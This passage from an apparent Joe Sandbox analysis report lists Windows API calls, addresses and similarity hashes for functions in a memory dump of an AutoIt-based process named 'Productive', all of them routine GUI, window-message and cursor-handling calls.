                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 0033AF51
                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 0033AF55
                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0033AF6B
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0033AF76
                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0033AF7B
                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 0033AF93
                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0033AFA1
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0033AFB2
                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0033AFBB
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0033AFC8
                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0033AFE7
                                                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0033AFFE
                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0033B013
                                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0033B05F
                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0033B086
                                                                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0033B0A4
                                                                                                                                                                • DrawFocusRect.USER32(?,?), ref: 0033B0AF
                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 0033B0BD
                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0033B0C5
                                                                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0033B0D9
                                                                                                                                                                • SelectObject.GDI32(?,0033AC1F), ref: 0033B0F0
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0033B0FB
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0033B101
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0033B106
                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 0033B10C
                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 0033B116
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1996641542-0
                                                                                                                                                                • Opcode ID: c4697ea1d2011850970dbeab7cacc6a72fa69d0964783fd199d508ada3ebb8b3
                                                                                                                                                                • Instruction ID: f3c4cc74359182b2ff64b82a4e29422621ce4bb4063b33bee45976d82badc06a
                                                                                                                                                                • Opcode Fuzzy Hash: c4697ea1d2011850970dbeab7cacc6a72fa69d0964783fd199d508ada3ebb8b3
                                                                                                                                                                • Instruction Fuzzy Hash: 46617F75900218AFDF169FA4DC48AAEBB7DEF09320F114115FA15AB2A1DB75A940CF90
                                                                                                                                                                APIs
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00335007
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0033501C
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00335023
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00335085
                                                                                                                                                                • DestroyWindow.USER32(?), ref: 003350B1
                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003350DA
                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003350F8
                                                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0033511E
                                                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00335133
                                                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00335146
                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00335166
                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00335181
                                                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00335195
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 003351AD
                                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 003351D3
                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 003351ED
                                                                                                                                                                • CopyRect.USER32(?,?), ref: 00335204
                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 0033526F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                                                                • Opcode ID: f1a524d30e48a1073ce653d77a6232c357135c3e84ad1430729fc9ce1fb28cc6
                                                                                                                                                                • Instruction ID: 2bfdf2f04a1915976ab9734386b680e91806ff24d4f4f2cc8464819fa7987b26
                                                                                                                                                                • Opcode Fuzzy Hash: f1a524d30e48a1073ce653d77a6232c357135c3e84ad1430729fc9ce1fb28cc6
                                                                                                                                                                • Instruction Fuzzy Hash: F0B17871614740AFDB05DF64C884B6ABBE4FF89310F008A1CF99A9B291DB71E815CF92
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003390EA
                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003390FB
                                                                                                                                                                • CharNextW.USER32(0000014E), ref: 0033912A
                                                                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0033916B
                                                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00339181
                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00339192
                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003391AF
                                                                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 003391FB
                                                                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00339211
                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00339242
                                                                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003392B0
                                                                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00339339
                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00339391
                                                                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0033943E
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00339460
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003394AA
                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003394D7
                                                                                                                                                                • DrawMenuBar.USER32(?), ref: 003394E6
                                                                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0033950E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 1015379403-4108050209
                                                                                                                                                                • Opcode ID: 35b4428b5c5dc94d52d5bf9d6e0c52e1e418fb5024d323ad80f7944cbd530989
                                                                                                                                                                • Instruction ID: 82cfaaa66b0ea2a71479e018f36e5fb4a3b837de25987228b920aac3329fb14a
                                                                                                                                                                • Opcode Fuzzy Hash: 35b4428b5c5dc94d52d5bf9d6e0c52e1e418fb5024d323ad80f7944cbd530989
                                                                                                                                                                • Instruction Fuzzy Hash: 12E19075900209EEDB229F50CCC4BEE7BBCEF09750F018156FA19AA290DBB09A81CF51
                                                                                                                                                                APIs
                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002B2C8C
                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 002B2C94
                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002B2CBF
                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 002B2CC7
                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 002B2CEC
                                                                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002B2D09
                                                                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002B2D19
                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002B2D4C
                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002B2D60
                                                                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 002B2D7E
                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 002B2D9A
                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 002B2DA5
                                                                                                                                                                  • Part of subcall function 002B2714: GetCursorPos.USER32(?), ref: 002B2727
                                                                                                                                                                  • Part of subcall function 002B2714: ScreenToClient.USER32(003777B0,?), ref: 002B2744
                                                                                                                                                                  • Part of subcall function 002B2714: GetAsyncKeyState.USER32(00000001), ref: 002B2769
                                                                                                                                                                  • Part of subcall function 002B2714: GetAsyncKeyState.USER32(00000002), ref: 002B2777
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,002B13C7), ref: 002B2DCC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                • String ID: AutoIt v3 GUI$h4
                                                                                                                                                                • API String ID: 1458621304-2145547538
                                                                                                                                                                • Opcode ID: f12c84e8d439a290a06d9dc67d84949aacd5c72b05631327f0c218f20969f8f0
                                                                                                                                                                • Instruction ID: 8832bd084420e1f5712fadfbf7e2b60d8022bddf803a940ae9030464fda4705f
                                                                                                                                                                • Opcode Fuzzy Hash: f12c84e8d439a290a06d9dc67d84949aacd5c72b05631327f0c218f20969f8f0
                                                                                                                                                                • Instruction Fuzzy Hash: E0B17E7561020AEFDB15DFA8DC49BED7BB8FB08350F104129FA15AB290DB74A861CF51
                                                                                                                                                                APIs
                                                                                                                                                                • GetForegroundWindow.USER32(00340980,?,?,?,?,?), ref: 002D04E3
                                                                                                                                                                • IsWindow.USER32(?), ref: 003066BB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Foreground
                                                                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                • API String ID: 62970417-1919597938
                                                                                                                                                                • Opcode ID: dc7f638d68affe2dc226fbc2a9488812af07cb26acb30fb01f54c8c1f1a157ab
                                                                                                                                                                • Instruction ID: 9cf21eefb99e8c1afcb41a2a62c10746345c49dc1b73fd25bd044923eac976f9
                                                                                                                                                                • Opcode Fuzzy Hash: dc7f638d68affe2dc226fbc2a9488812af07cb26acb30fb01f54c8c1f1a157ab
                                                                                                                                                                • Instruction Fuzzy Hash: C3D1E330115602DBCB06EF20C4A2A9ABBA5FF55304F104A1EF456576A6DB30FD79CF92
                                                                                                                                                                APIs
                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 003344AC
                                                                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0033456C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                • API String ID: 3974292440-719923060
                                                                                                                                                                • Opcode ID: b6787282c845f54ee0d17ef32ebd64b3aab1fa121badca23d05cf724915adb86
                                                                                                                                                                • Instruction ID: 38e16a5854e707c492eee316f120a6197dddfcd909f6867c1c76824dd4fa2875
                                                                                                                                                                • Opcode Fuzzy Hash: b6787282c845f54ee0d17ef32ebd64b3aab1fa121badca23d05cf724915adb86
                                                                                                                                                                • Instruction Fuzzy Hash: E5A17E302242119FCB15EF20C891B7AB3A5EF89354F108969F8A69B7E2DB30FD15CB51
                                                                                                                                                                APIs
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 003256E1
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 003256EC
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 003256F7
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00325702
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0032570D
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00325718
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00325723
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 0032572E
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00325739
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00325744
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 0032574F
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 0032575A
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00325765
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00325770
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0032577B
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00325786
                                                                                                                                                                • GetCursorInfo.USER32(?), ref: 00325796
                                                                                                                                                                • GetLastError.KERNEL32(00000001,00000000), ref: 003257C1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3215588206-0
                                                                                                                                                                • Opcode ID: 7d8724ba5964382c4b14bf2f6f013ec44a09c093841fff0b4925697c9a34564a
                                                                                                                                                                • Instruction ID: 87c7565cc64fafe019334b81417b57b39e72ed8770e7f1ca956f76239047b347
                                                                                                                                                                • Opcode Fuzzy Hash: 7d8724ba5964382c4b14bf2f6f013ec44a09c093841fff0b4925697c9a34564a
                                                                                                                                                                • Instruction Fuzzy Hash: 9A418470E44319AADB109FBA9C49D6EFFF8EF41B50B10452FE509E7291DAB8A500CE91
                                                                                                                                                                APIs
                                                                                                                                                                • LoadIconW.USER32(00000063), ref: 0030CBAA
                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0030CBBC
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0030CBD3
                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0030CBE8
                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0030CBEE
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0030CBFE
                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0030CC04
                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0030CC25
                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0030CC3F
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0030CC48
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0030CCB3
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0030CCB9
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0030CCC0
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0030CD0C
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0030CD19
                                                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0030CD3E
                                                                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0030CD69
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3869813825-0
                                                                                                                                                                • Opcode ID: 7c5b3c552835a2b77a914d12674d23e51698af9305e3e0c22794821def89b426
                                                                                                                                                                • Instruction ID: c3eaa57dcfd521c8233ee4cb9de43d27a9b256542297649455e9da30cb3dd003
                                                                                                                                                                • Opcode Fuzzy Hash: 7c5b3c552835a2b77a914d12674d23e51698af9305e3e0c22794821def89b426
                                                                                                                                                                • Instruction Fuzzy Hash: 80517230A00709AFDB22DFA8CD95B6EBBF9FF04705F010618E686A65A0CB74B915CF50
                                                                                                                                                                APIs
                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00334A61
                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00334AAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                                                                • Opcode ID: a0cc2997b504661ae5144d824058caa9f9b92fddb69b3303fc8de6b14a4e3720
                                                                                                                                                                • Instruction ID: 95a497fee8072f114d6028c07ddf6af416dc4601aaa5bbf811dd5567f09134d3
                                                                                                                                                                • Opcode Fuzzy Hash: a0cc2997b504661ae5144d824058caa9f9b92fddb69b3303fc8de6b14a4e3720
                                                                                                                                                                • Instruction Fuzzy Hash: B6918C342107019BCB06EF20C491AA9B7A6EF94354F10895DF8965B7A3CB34FD5ACF82
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(00000000,?), ref: 0033A8F8
                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0033A972
                                                                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0033A994
                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0033A9A7
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0033A9C9
                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002B0000,00000000), ref: 0033AA00
                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0033AA19
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0033AA32
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0033AA39
                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0033AA51
                                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0033AA69
                                                                                                                                                                  • Part of subcall function 002B29AB: GetWindowLongW.USER32(?,000000EB), ref: 002B29BC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                                                                • API String ID: 1652260434-3619404913
                                                                                                                                                                • Opcode ID: 41d7968b6a02c8b5fcb3fdf7a56532d8ec9d3e05cac50b2c121dd48ab99f0154
                                                                                                                                                                • Instruction ID: 69e6080d7bf1f54eade582b9301438fb506b5dc5cce03df243eff9338af985a4
                                                                                                                                                                • Opcode Fuzzy Hash: 41d7968b6a02c8b5fcb3fdf7a56532d8ec9d3e05cac50b2c121dd48ab99f0154
                                                                                                                                                                • Instruction Fuzzy Hash: 6271EE71200604AFD726CF28CC89F6777E9FB89300F09051CF98A8B2A0CB35E911DB52
                                                                                                                                                                APIs
                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0033BF26
                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003397E7), ref: 0033BF82
                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0033BFBB
                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0033BFFE
                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0033C035
